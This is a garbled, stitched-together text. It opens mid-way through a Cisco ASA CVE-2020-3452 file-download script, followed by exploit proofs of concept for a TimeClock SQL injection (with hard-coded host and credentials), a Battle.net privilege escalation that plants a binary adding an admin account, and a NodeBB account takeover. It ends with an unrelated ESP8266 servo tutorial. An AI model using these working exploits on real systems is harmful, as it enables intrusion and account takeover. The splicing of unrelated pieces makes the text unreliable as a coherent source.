session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen" mkdir cisco_asa_files if [ -z "$1" ]; then echo "Usage: cve-2020-3452.sh <target ip/hostname>" echo "Example: cve-2020-3452.sh mytarget.com" echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory" echo "Target not specificed...exiting..." else for FILE in $CISCO_KNOWN_FILES; do curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE; done fi
#!/usr/bin/python3
# Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection
# Date: July 21, 2020
# Exploit Author: François Bibeau
# Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90
# Vendor Homepage: http://timeclock-software.net/
# Software Link: http://timeclock-software.net/timeclock-download.php
# Version: 1.01
# Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache

# NOTE(review): the page carried this script flattened onto one line; line
# breaks and indentation below are reconstructed.
#
# Defender summary: an authenticated session POSTs to /add_entry.php with a
# `notes` value containing `SLEEP(5)`; a hit is inferred from the response
# taking longer than 5 s. Detection: POST /add_entry.php whose `notes`
# field contains `SLEEP(` / `IF((SELECT`, and a run of such requests each
# lasting ~5 s. Mitigation: prepared statements for the add_entry insert.

import time
import requests

# Hard-coded test host and throw-away test credentials (fred/fred) used by
# the authors' lab instance.
login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target
login_data = {'username':'fred','password':'fred','submit':'Log In'}
headers = {'User-Agent': 'Mozilla/5.0'}

# init session & login
session = requests.Session()
session.post(login_url,headers=headers,data=login_data)

# static list provided for PoC, could use a text file
users = ['john','bill','tim','fred','garry','sid','admin']

for user in users:
    url = "http://159.203.41.34/add_entry.php"
    payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='"
    data = {'data_month': '1', 'data_day': '1', 'data_year': '1', 'type_id': '5', 'hours': '1', 'notes': payload, 'submit': 'Add'}
    print(f'Checking user {user}... ', end = '')
    start = time.time()
    response = session.post(url,data=data)   # response body is never inspected; only wall-clock time matters
    end = time.time()
    delay = end - start
    # The measured delay includes network latency, so a slow link can
    # produce a false positive even with a non-existent user.
    if delay > 5:
        print('User found!')
    else:
        print('')
  23. # Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop ) # Version Patch: 1.27.1.12428 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Battle.Net Launcher (Battle.net.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory 'Battle.net' and its files and sub-dirs world-writable. ## Insecure Folder Permission C:\Program Files (x86)>icacls Battle.net Battle.net BUILTIN\Users:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) CREATOR OWNER:(OI)(CI)(F) ## Insecure File Permission C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe" Battle.net.exe BUILTIN\Users:(I)(F) BUILTIN\Administrators:(I)(F) FREY-OMEN\30698:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\Program Files (x86)\Battle.net> whoami lowpriv C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe #4. Transfer created 'Battle.net.exe' to the Windows Host #5. 
Move the created 'Battle.net.exe' binary to the 'C:\Program Files (x86)\Battle.net>' Folder C:\Program Files (x86)\Battle.net> move C:\Users\lowpriv\Downloads\Battle.net.exe . #6. Check that exploit admin user doesn't exists C:\Program Files (x86)\Battle.net> net user placebo The user name could not be found #6. Reboot the Computer C:\Program Files (x86)\Battle.net> shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None
  24. # Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover # Date: 2020-08-18 # Exploit Author: Muhammed Eren Uygun # Vendor Homepage: https://nodebb.org/ # Software Link: https://github.com/NodeBB/NodeBB # Version: 1.12.2-1.14.2 # Tested on: Linux # CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7 Impact: ---------------------- A bug in the server-side validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to privilege escalation via an account takeover. Bug PoC: ---------------------- Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4 1- Create a user 2- Go to the password change page 3- Change the password while intercepting the request with a proxy 427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)]) 4- Replace the uid in the request with 1, which is the uid value of the admin user, and send the request. 5- You can then log in to the admin user with this password.
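/*
 * Article text (kept from the page):
 *
 * In this article, we will use Xiao Ai to control the SG90 servo. This can
 * simply realize some operations such as opening the door and opening the
 * light using the servo.
 *
 * Material preparation: ESP8266, SG90 servo, DuPont line.
 *
 * Line connection - the three wires of the servo: yellow wire -> signal (D4),
 * red wire -> positive electrode (5V), brown wire -> negative electrode (G).
 *
 * [effect image]
 *
 * Code:
 */

// NOTE(review): the listing on the page lost its angle brackets and string
// quotes during extraction (`#include Servo.h`, `'btn-max'`, `'PDCN'`); they
// are restored here so the sketch compiles. The article's values (key, SSID,
// password) are left exactly as published. The page also showed the button
// callbacks taking `const String state` by value; Blinker's attach() expects
// a `const String &` parameter in the upstream examples, so the reference
// form is used here — confirm against the installed Blinker version.

#include <Servo.h>

#define BLINKER_WIFI
#define BLINKER_MIOT_OUTLET
#include <Blinker.h>

char auth[] = "064****a9";    // Blinker device key (redacted in the article)
char ssid[] = "PDCN";         // wifi name
char pswd[] = "1234567890";   // wifi password

// Create the component objects. The string passed to each is the data key
// name the Blinker app uses for that widget.
BlinkerButton Button1("btn-max");   // Maximum button
BlinkerButton Button2("btn-min");   // Minimum value button
Servo myservo;
BlinkerSlider Slider3("ser-num");   // Real-time position slider; data key name; range 1-180

// servo_max / servo_min are the two end positions, ser_num the last slider
// value. time_num is assigned in setup() but never read anywhere else.
int servo_max, servo_min, ser_num, time_num;

// Maximum button: move the servo to servo_max.
void button1_callback(const String & state)
{
    BLINKER_LOG("get button state: ", servo_max);
    myservo.write(servo_max);
    Blinker.vibrate();
}

// Minimum button: move the servo to servo_min.
void button2_callback(const String & state)
{
    BLINKER_LOG("get button state: ", servo_min);
    myservo.write(servo_min);
    Blinker.vibrate();
}

// Slider: move the servo directly to the slider value (no clamping is done
// here; the widget range of 1-180 is configured on the app side).
void slider3_callback(int32_t value)
{
    ser_num = value;
    myservo.write(ser_num);
    Blinker.delay(100);
    BLINKER_LOG("get slider value: ", value);
}

// Xiao Ai (MIoT) power-state handler: "on" drives to servo_max, "off" to
// servo_min; any other state is ignored.
void miotPowerState(const String & state)
{
    BLINKER_LOG("need set power state: ", state);
    if (state == BLINKER_CMD_ON) {
        BLINKER_LOG("get button state: ", servo_max);
        myservo.write(servo_max);
        Blinker.vibrate();
    }
    else if (state == BLINKER_CMD_OFF) {
        BLINKER_LOG("get button state: ", servo_min);
        myservo.write(servo_min);
        Blinker.vibrate();
    }
}

void setup()
{
    Serial.begin(115200);
    BLINKER_DEBUG.stream(Serial);
    Blinker.begin(auth, ssid, pswd);
    Button1.attach(button1_callback);
    Button2.attach(button2_callback);
    Slider3.attach(slider3_callback);
    BlinkerMIOT.attachPowerState(miotPowerState);
    myservo.attach(2);       // servo.attach(): set the servo data pin (GPIO2, the D4 pin from the wiring notes above)
    myservo.write(10);       // servo.write(): set the rotation angle
    servo_max = 150;         // the degree of rotation, here my range is 0-150°
    servo_min = 0;
    time_num = 500;
}

void loop()
{
    Blinker.run();
}

// Regarding the pins, please refer to the figure below.
// [pin-map figure]
// [effect image]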